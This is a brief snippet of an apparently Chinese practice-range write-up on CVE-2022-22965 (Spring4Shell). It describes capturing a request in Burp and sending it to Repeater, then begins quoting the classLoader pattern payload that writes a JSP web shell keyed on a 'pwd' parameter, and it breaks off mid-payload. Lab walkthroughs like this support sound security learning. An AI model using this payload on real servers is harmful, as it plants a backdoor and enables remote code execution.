CVE-2022-22965~框架漏洞【春秋云境靶场渗透】
# 我们首先使用burp抓包# 然后我们发送给repeater并修改数据包 GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.…
2024-08-22